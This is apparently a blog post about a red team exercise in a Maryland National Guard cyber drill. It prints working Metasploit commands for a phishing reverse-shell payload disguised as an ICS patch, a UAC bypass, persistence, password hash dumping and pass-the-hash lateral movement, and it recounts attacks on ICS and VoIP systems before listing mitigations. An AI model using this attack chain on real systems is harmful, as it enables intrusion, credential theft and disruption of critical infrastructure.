Red Team Rookie

This year's Vigilant Guard for the State of Maryland had a cyber security component that comprised of joint Army and Air National Guard, Civilian, Government and Maryland Defense Forces (MDDF). I had the pleasure of being the NCOIC of the Red Team in the cyber defense portion of the exercise. This was my first real time being on a Red Team. I have done many Blue Teams and even White. So when this opportunity came along, I could not pass it up. Please check out this link for more information on Vigilant Guard.

The scenario for this cyber exercise was based around a Maryland county services during a hurricane. A Cyber Protection Team (CPT) has been dispatched to assist a 911 call center and a water treatment plant that is having anomalies. Of course that would be anomalies cause by the Red Team.

Now, let me describe the systems that make up the scenario. There were two Active Directory Domains, one for the 911 call center and one for the water treatment plant, made up of Windows Server 2008 R2 servers and Windows 8 workstations. The 911 call center was utilizing Cisco VoIP phones and FreePBX/Asterisk linux based solution. The water treatment plant consisted of real ICS equipment and a Windows 8 system that provided the HMI/PLC for the equipment.

In the following, I will describe the process and tools that were utilized by the team to infiltrate and control the Blue Team systems. Mostly we utilized Kali Linux and tools that were included in that distribution. And lets not forget the tools that are provide on the systems themselves. Like Powershell and Sysinternals. Well Sysinternals are not natural on the Windows systems. But they were installed on the Domain Controllers, so we utilized them.

Getting a Foothold

In the beginning, there was email. Well a phishing email containing malware that was describe as the a patch for the ICS systems. This malware was created with MSFVenom. This is not the exact malware that was created, but very similar.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST={listener IP} LPORT={listener port} -b "\x00" -e x86/shikata_ga_nai -f exe > hmipatch.exe

  • -a x86 --platform windows (architecture)
  • -p windows/meterpreter/reverse_tcp (payload to embed)
  • LHOST (listener IP address)
  • LPORT (listener port)
  • -b "\x00" (avoid bad character "null bytes")
  • -e x86/shikata_ga_nai (encoder)
  • -f exe > hmipatch.exe (format output)

Of course, we needed a way to catch the beacon back when the naive user runs the hmipatch.exe. We setup a listener within Metasploit.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST {listener IP}
set LPORT {listernet port}
run

The {listener IP} and {listener port} must match what was created with the malware. Once the hmipatch.exe was executed, a meterpreter session is open on our attacking system.

Now we had to elevate our session on the exploited system. But the issue is that the malware was run by a normal use and since it is Windows 8, the system is using UAC (User Access Control). To get elevate, we must use another exploit.

background (places new session in background)
sessions (need to get the session number)
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST {listener IP}
set LPORT {listernet port}
set session {session number}
exploit

This gives us a new session that we can further utilize to elevate privileges. Then run a few more commands within this new session.

getuid (used to see what our process is running under)
getsystem (attempts to elevate to the system process)
getpid (tells us what process ID we are running under)
ps (tells us what other processes are running)
migrate {pid} (we chose another process running under "NT AUTHORITY\SYSTEM")

We now had elevated privileges and can plan for our lateral movement. We need some more credential and we need to establish persistence within this exploited system. First we established persistence.

run persistence -x -a -p {port} -P windows/meterpreter/reverse_tcp

Then we gathered the hashes of users that are part of the local SAM database.

hashdump

This provided us with the password hash of all users including the local administrator. Which in most cases, is the same on all the systems. Which was true for us on the Windows systems that the Blue Teams were trying to protect.

The Blue Team had not moved into a securing phase for the systems they are protecting. Their firewalls were wide open, we could easily NMAP scan for other systems and utilize a different exploit to access those systems, including the Domain Controllers (keys to the kingdom).

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set RHOST {IP of target}
set LHOST {listener IP}
set LPORT {listernet port}
set SMBDomain {domain name of target}
set SMBUser Administrator
set SMBPass {password hash of Administrator}
exploit

This worked for any of the Windows systems we were trying to exploit, including the HMI. I personally did not work to closely with the ICS and VoIP attacks. So I can't speak to the these attacks to deep.

ICS Impact

Since there was real ICS equipment implemented, there was the possibility for kinetic effects. Access to the HMI/PLC was accomplished mostly because of the access to the Windows systems.

Remote Desktop (RDP) was utilized to manipulate the controls directly on the HMI from the Kali boxes using rdesktop. We also deployed ModbusMaster to allow for direct commands to the ICS equipment from a few of the other Windows systems.

The Red Team was able to speed up and slow down operations of the equipment to demonstrate the given effects. So much more damage could have been achieved this way, but we proved our point.

VoIP Havoc

Like I stated before, there was no firewall rules in place to keep the team out. So the fun began for the team doing the attack on the VoIP systems. They utilized tools like inviteflood, sipvicious and Metasploit.

These tools allowed the Red Team to make the phones continually ring or drop existing calls. The team would change the caller ID to display any message they wanted. They even Rick Roll'D the hold music.

Mitigations

Let me wrap this up with the talk of some mitigations. First, let me state that this target was extremely open because of the nature of the exercise. This mean that the common things like firewalls, or the rules, were relaxed to make the Red Team's job easier. This was not a test for the Red Team, it was a learning opportunity for the Blue Team.

Defense in Depth is a real thing and the best mitigation are sometimes very simple to accomplish. Starting with the perimeter, it needed to be locked down, block any/any on the ingress. Then open only the ports that are needed to support the business. Like port 80 (http) to the web server in the DMZ.

The next is not so easy, but is necessary. Run the latest version of software. Upgrading, maintaining and operating come at a cost. But so does a compromised environment. Modern operating systems come with better built-in solution for reducing the attack surface. Not only keep the system at a newer version, keep them patched.

And lastly for now, educate the users. Humans are the weakest link, phishing is the number one means of initial access into a network.

In future post I will talk about various mitigation in more detail in securing a Windows environment.

Resources

Here are a few resources for helping you with your Metasploit journey: